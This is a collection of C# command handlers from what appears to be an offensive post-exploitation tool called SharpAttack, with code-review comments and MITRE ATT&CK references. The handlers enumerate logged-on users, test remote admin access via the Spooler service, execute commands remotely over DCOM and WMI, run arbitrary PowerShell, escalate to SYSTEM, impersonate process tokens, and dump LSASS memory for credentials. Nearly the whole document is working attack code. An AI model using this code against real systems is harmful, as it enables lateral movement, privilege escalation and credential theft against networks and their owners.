예제 #1
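        /// <summary>
        /// Prints help text: the parameter table of a single command when "Command" is
        /// supplied, otherwise the list of every entry in SharpAttack.AvailableCommands.
        /// </summary>
        /// <param name="RunParams">Parsed parameters keyed by name; only "Command" is read here.</param>
        public override void Run(Dictionary <String, Parameter> RunParams)
        {
            if (!RunParams.TryGetValue("Command", out Parameter command))
            {
                Printing.TableHeader("SharpAttack Commands", "Here are the commands available to you", "Command", "Description");
                foreach (KeyValuePair <string, Command> entry in SharpAttack.AvailableCommands)
                {
                    Printing.TableItem(entry.Key, entry.Value.Helptext);
                }
                return;
            }

            // The requested name is read once, inside the try. The handler below used to
            // index command.Value[0] again, so a "Command" parameter with no value threw a
            // second time from inside the catch and escaped Run entirely.
            string requested = null;
            try
            {
                requested = command.Value[0];
                Command cmd = SharpAttack.AvailableCommands[requested];
                Printing.TableHeader(requested, cmd.Helptext, "Parameter", "Description");

                foreach (KeyValuePair <string, Parameter> parm in cmd.Parameters)
                {
                    Printing.TableItem($"-{parm.Key}", parm.Value.HelpText);
                }
            }
            catch
            {
                // Deliberately broad, as in the original: any failure while looking up or
                // printing the command is reported as "not found".
                Printing.Error($"No command found named: {requested}");
            }
        }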
예제 #2
        /// <summary>
        /// For every target returned by Proccessing.GetTargets, prints each distinct user
        /// that Net.GetNetLoggedOnUsers reports, skipping names that end in "$"
        /// (conventionally machine accounts).
        /// </summary>
        /// <param name="RunParams">Parsed parameters; passed unchanged to Proccessing.GetTargets.</param>
        public override void Run(Dictionary <String, Parameter> RunParams)
        {
            List <string> targets = Proccessing.GetTargets(RunParams);

            // An empty target list produces no output at all, not even an error.
            foreach (string target in targets)
            {
                string computer = target;
                try
                {
                    // A null entry is treated as the local machine.
                    computer = computer ?? "localhost";

                    List <string>           alreadyShown = new List <string>();
                    List <Net.LoggedOnUser> sessions     = Net.GetNetLoggedOnUsers(computer);
                    Printing.CmdOutputHeading($"Logged on users for {computer}");

                    foreach (Net.LoggedOnUser session in sessions)
                    {
                        bool isMachineStyleName = session.UserName.EndsWith("$");
                        if (isMachineStyleName || alreadyShown.Contains(session.UserName))
                        {
                            continue;
                        }

                        Printing.CmdOutputItem($"User {session.UserName} is logged in from {session.ComputerName}");
                        alreadyShown.Add(session.UserName);
                    }
                }
                catch
                {
                    // Any failure for this host is reported once; the loop moves on to the next target.
                    Printing.Error($"Could not get logged on users for {computer}");
                }
            }
        }
예제 #3
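        /// <summary>
        /// Scans the targets on port 445 and, for each host where the port is open, tries to
        /// open a handle to the "Spooler" service; success is reported as admin access.
        /// </summary>
        /// <param name="RunParams">Parsed parameters; passed unchanged to Proccessing.GetTargets.</param>
        /// <remarks>
        /// NOTE(review): for detection purposes this presumably appears as a port-445 probe
        /// followed by a remote service-control connection to each responsive host. Confirm
        /// against the telemetry actually collected.
        /// </remarks>
        public override void Run(Dictionary <String, Parameter> RunParams)
        {
            List <string> targets = Proccessing.GetTargets(RunParams);

            if (targets.Count == 0)
            {
                Printing.Error("Need to specify a ComputerName or IPAddress");
                return;
            }

            // The meaning of the third PortScan argument is not visible from this method.
            SharpSploitResultList <Network.PortScanResult> scan = Network.PortScan(targets, 445, true);
            foreach (Network.PortScanResult scanResult in scan)
            {
                if (!scanResult.IsOpen)
                {
                    Printing.Error($"Port {scanResult.Port} is not open on {scanResult.ComputerName}");
                    continue;
                }

                // ServiceController is IDisposable. The original never disposed it, leaking
                // one controller object per open host.
                using (ServiceController serviceController = new ServiceController("Spooler", scanResult.ComputerName))
                {
                    try
                    {
                        // Reading ServiceHandle forces the handle to be opened, and that is the
                        // actual access check. The handle is closed again immediately.
                        serviceController.ServiceHandle.Close();
                        Printing.Success($"Admin access to {scanResult.ComputerName}");
                    }
                    catch
                    {
                        Printing.Error($"No access to {scanResult.ComputerName}");
                    }
                }
            }
        }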
예제 #4
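        /// <summary>
        /// Passes each "Command" value to DCOM.DCOMExecute for the hosts in "ComputerName",
        /// using the DCOM method selected by the optional "Method" parameter.
        /// </summary>
        /// <param name="RunParams">
        /// Parsed parameters. "ComputerName" and "Command" are required; "Parameters" and
        /// "Method" (MMC20, ShellWindow, ShellBrowserWindow, ExcelDDE) are optional.
        /// </param>
        /// <remarks>
        /// Remote execution over DCOM corresponds to MITRE ATT&amp;CK T1021.003, which is
        /// the usual reference point for detection content covering this behaviour.
        /// </remarks>
        public override void Run(Dictionary <String, Parameter> RunParams)
        {
            string arguments = null;
            if (RunParams.TryGetValue("Parameters", out Parameter parametersParam))
            {
                arguments = parametersParam.Value[0];
            }

            // MMC20_Application remains the default when "Method" is omitted.
            DCOM.DCOMMethod dcomMethod = DCOM.DCOMMethod.MMC20_Application;
            if (RunParams.TryGetValue("Method", out Parameter methodParam))
            {
                string value = methodParam.Value[0];

                switch (value)
                {
                case "MMC20":
                    dcomMethod = DCOM.DCOMMethod.MMC20_Application;
                    break;

                case "ShellWindow":
                    dcomMethod = DCOM.DCOMMethod.ShellWindows;
                    break;

                case "ShellBrowserWindow":
                    dcomMethod = DCOM.DCOMMethod.ShellBrowserWindow;
                    break;

                case "ExcelDDE":
                    dcomMethod = DCOM.DCOMMethod.ExcelDDE;
                    break;

                default:
                    // Fail closed. The original printed this error and then carried on with
                    // the default method, so a mistyped "Method" still ran the command through
                    // a mechanism the caller never selected.
                    Printing.Error($"{value} is not a valid method");
                    return;
                }
            }

            if (!RunParams.TryGetValue("ComputerName", out Parameter computer))
            {
                Printing.Error("No Computer Name specified.");
                return;
            }

            if (!RunParams.TryGetValue("Command", out Parameter command))
            {
                Printing.Error("No command specified");
                return;
            }

            foreach (string cmd in command.Value)
            {
                DCOM.DCOMExecute(computer.Value, cmd, arguments, null, dcomMethod);
            }
        }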
예제 #5
 /// <summary>
 /// Calls tokens.RevertToSelf() and prints whether it succeeded.
 /// </summary>
 /// <param name="RunParams">Unused by this command.</param>
 public override void Run(Dictionary <String, Parameter> RunParams)
 {
     // NOTE(review): `tokens` is declared outside this method; presumably it is the
     // instance that performed an earlier impersonation. Confirm against the class.
     bool reverted = tokens.RevertToSelf();
     if (!reverted)
     {
         Printing.Error("Failed to revert to self. We're stuck forever.");
         return;
     }

     Printing.Success("Successfully reverted to self");
 }
예제 #6
 /// <summary>
 /// Calls tokens.GetSystem() and prints whether it succeeded.
 /// </summary>
 /// <param name="RunParams">Unused by this command.</param>
 /// <remarks>
 /// Token-based privilege escalation of this kind is catalogued under MITRE ATT&amp;CK
 /// T1134 (Access Token Manipulation).
 /// </remarks>
 public override void Run(Dictionary <String, Parameter> RunParams)
 {
     // `tokens` is declared outside this method.
     bool elevated = tokens.GetSystem();
     if (!elevated)
     {
         Printing.Error("Failed to get SYSTEM");
         return;
     }

     Printing.Success("Successfully became SYSTEM");
 }
예제 #7
 /// <summary>
 /// Passes every "Command" value to Shell.PowerShellExecute and prints what it returns.
 /// </summary>
 /// <param name="RunParams">Parsed parameters; "Command" is required.</param>
 /// <remarks>
 /// The command text is passed through unmodified; this method does no validation or
 /// filtering. NOTE(review): whether the execution is visible to PowerShell script-block
 /// logging depends on how Shell.PowerShellExecute hosts the runtime, which cannot be
 /// seen from this method.
 /// </remarks>
 public override void Run(Dictionary <String, Parameter> RunParams)
 {
     if (!RunParams.TryGetValue("Command", out Parameter command))
     {
         Printing.Error("No command specified");
         return;
     }

     foreach (string script in command.Value)
     {
         string output = Shell.PowerShellExecute(script);
         Printing.CmdOutput(output);
     }
 }
예제 #8
        /// <summary>
        /// Writes a process dump through Host.CreateProcessDump: of the process named by
        /// "PID" when one is supplied, otherwise of "lsass".
        /// </summary>
        /// <param name="RunParams">
        /// Parsed parameters. "PID", "OutputPath" and "OutputName" are all optional; the
        /// defaults are the current directory and "output.bin".
        /// </param>
        /// <remarks>
        /// An LSASS memory dump contains credential material (MITRE ATT&amp;CK T1003.001).
        /// NOTE(review): int.Parse is called outside any try block, so a non-numeric "PID"
        /// throws out of Run instead of printing an error.
        /// </remarks>
        public override void Run(Dictionary <String, Parameter> RunParams)
        {
            // A negative id means "no PID given" and selects the by-name overload below.
            int    id         = -1;
            string OutputPath = Host.GetCurrentDirectory();
            string OutputName = "output.bin";

            if (RunParams.TryGetValue("PID", out Parameter pid))
            {
                id = int.Parse(pid.Value[0]);
            }

            if (RunParams.TryGetValue("OutputPath", out Parameter outpath))
            {
                OutputPath = outpath.Value[0];
            }

            if (RunParams.TryGetValue("OutputName", out Parameter outname))
            {
                OutputName = outname.Value[0];
            }

            try
            {
                bool dumpByName = id < 0;
                if (dumpByName)
                {
                    Host.CreateProcessDump("lsass", OutputPath, OutputName);
                }
                else
                {
                    Host.CreateProcessDump(id, OutputPath, OutputName);
                }

                Printing.Success($"Dump created at {OutputPath}\\{OutputName}");
            }
            catch
            {
                // The cause of the failure is discarded; only a generic message is shown.
                Printing.Error($"Error creating process dump.");
            }
        }
예제 #9
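 /// <summary>
 /// Passes each "Command" value to WMI.WMIExecute for the hosts in "ComputerName".
 /// </summary>
 /// <param name="RunParams">Parsed parameters; "ComputerName" and "Command" are both required.</param>
 /// <remarks>
 /// Remote execution over WMI corresponds to MITRE ATT&amp;CK T1047. The two trailing
 /// null arguments to WMIExecute are not explained by this method.
 /// </remarks>
 public override void Run(Dictionary <String, Parameter> RunParams)
 {
     if (!RunParams.TryGetValue("ComputerName", out Parameter computer))
     {
         // The original returned silently here, so a missing ComputerName was
         // indistinguishable from a run that did nothing.
         Printing.Error("No Computer Name specified.");
         return;
     }

     if (!RunParams.TryGetValue("Command", out Parameter command))
     {
         Printing.Error("No command specified");
         return;
     }

     foreach (string cmd in command.Value)
     {
         WMI.WMIExecute(computer.Value, cmd, null, null);
     }
 }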
예제 #10
 /// <summary>
 /// Converts "PID" to an unsigned integer, calls Tokens.ImpersonateProcess on it and
 /// prints whether the call succeeded.
 /// </summary>
 /// <param name="RunParams">Parsed parameters; "PID" is required.</param>
 /// <remarks>
 /// Impersonating another process's token is catalogued under MITRE ATT&amp;CK T1134
 /// (Access Token Manipulation).
 /// NOTE(review): Convert.ToUInt32 throws on non-numeric or negative input and nothing
 /// here catches it.
 /// </remarks>
 public override void Run(Dictionary <String, Parameter> RunParams)
 {
     if (!RunParams.TryGetValue("PID", out Parameter pid))
     {
         Printing.Error("No PID specified");
         return;
     }

     UInt32 processId = Convert.ToUInt32(pid.Value[0]);

     // A fresh Tokens instance is created on each call.
     Tokens impersonator = new Tokens();
     bool   impersonated = impersonator.ImpersonateProcess(processId);

     if (!impersonated)
     {
         Printing.Error("Failed to impersonate process");
         return;
     }

     Printing.Success("Successfully impersonated process.");
 }